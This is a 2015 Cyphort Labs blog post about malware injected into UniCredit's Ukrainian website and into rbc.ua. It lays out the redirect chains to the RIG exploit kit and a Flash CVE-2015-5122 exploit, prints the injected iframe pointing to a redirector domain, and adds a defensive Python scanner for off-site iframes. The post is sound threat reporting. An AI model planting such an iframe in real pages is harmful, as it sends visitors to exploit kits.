Posted on July 16th, 2015 by Nick Bilogorskiy
Cyphort Labs discovered a malware infection at the Ukrainian website of UniCredit bank, unicredit.ua. UniCredit Group is a leading European commercial bank with an international network spanning 17 European countries and more than 149,000 employees. It has 950 billion euros in assets and is the largest Italian bank by market capitalization.

The Ukrainian website unicredit.ua is the 704th most popular website in Ukraine, according to Alexa. The exploit does not trigger on every page load, so some logic must control when the malware redirection occurs.

Here is the full infection chain:
1. start: www.unicredit.ua
2. redirector: oggy.co
3. payload: cancel.bananacake.info/<malware>
The website redirects to a Flash exploit for CVE-2015-5122 hosted at bananacake.info, served by the RIG exploit kit. The kit's JavaScript can detect the presence of some antivirus software on the system; see the code listing below.
In this case malvertising was not involved; instead the site itself was compromised. Specifically, the following iframe was injected into https://www.unicredit.ua/script/cutthroughbanner.js:
<iframe src="http://oggy.co/wkap.php" width="101" height="102"></iframe>
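One way a defender can catch this kind of injection is to scan a site's own JavaScript for iframes that point at foreign domains. The script below is an added example, not code from the original post or from Cyphort; the sample banner script is constructed to mimic the injected line, and the trusted-domain list and the 200-pixel "small frame" threshold are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a benign banner function plus the kind of injected
# off-site iframe described in the post (small, fixed size, foreign host).
SAMPLE_JS = """
function showBanner(){ document.getElementById('cut').style.display='block'; }
document.write('<iframe src="http://oggy.co/wkap.php" width="101" height="102"></iframe>');
"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*["']([^"']*)["']""")

def find_injected_iframes(js_text, trusted_domains):
    """Return findings for every iframe whose src host is outside trusted_domains.

    Each finding records the host, the full src, and whether the frame is
    'small' (both width and height <= 200px), a common trait of hidden
    redirector frames.  Relative or same-origin frames are ignored.
    """
    findings = []
    for tag in IFRAME_RE.findall(js_text):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        if not host:
            continue  # relative src: same origin, not an off-site redirector
        if any(host == d or host.endswith("." + d) for d in trusted_domains):
            continue  # first-party frame, expected content
        w, h = attrs.get("width", ""), attrs.get("height", "")
        small = w.isdigit() and h.isdigit() and int(w) <= 200 and int(h) <= 200
        findings.append({"host": host, "src": src, "small": small})
    return findings

if __name__ == "__main__":
    # Assumed first-party domain for the site being checked.
    for f in find_injected_iframes(SAMPLE_JS, {"unicredit.ua"}):
        print("suspicious iframe -> %s (small=%s)" % (f["src"], f["small"]))
```

Run it against a local copy of each script the site serves and alert on any finding; a foreign host plus a tiny fixed size is a strong indicator of an injected redirector.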
We reached out to UniCredit to notify them of this attack, but have not heard back so far.
Interestingly, this is not the only attack on a prominent Ukrainian website this week. Two days ago, on Jul 13 at 09:31 UTC, we saw the same attack, likely by the same group, on another high-profile Ukrainian news site: rbc.ua.
RBC stands for RosBusinessConsulting, a large media group listed on the Russian stock exchange as RBCM. It has more than 1,500 employees and revenue of $81 million. Here is the RBC.ua infection chain:
1. start: www.rbc.ua
2. payload: add.gainesville-hypnosis.com/?<malware>
The RIG exploit kit was also used in the RBC.ua compromise. RIG is a popular exploit kit that has been around for about a year and is sold on various “underground” forums. See the screenshot below (from http://www.malwaretech.com/).
Cyphort Labs is monitoring this campaign and analyzing the payload executable and will share more results as soon as they become available.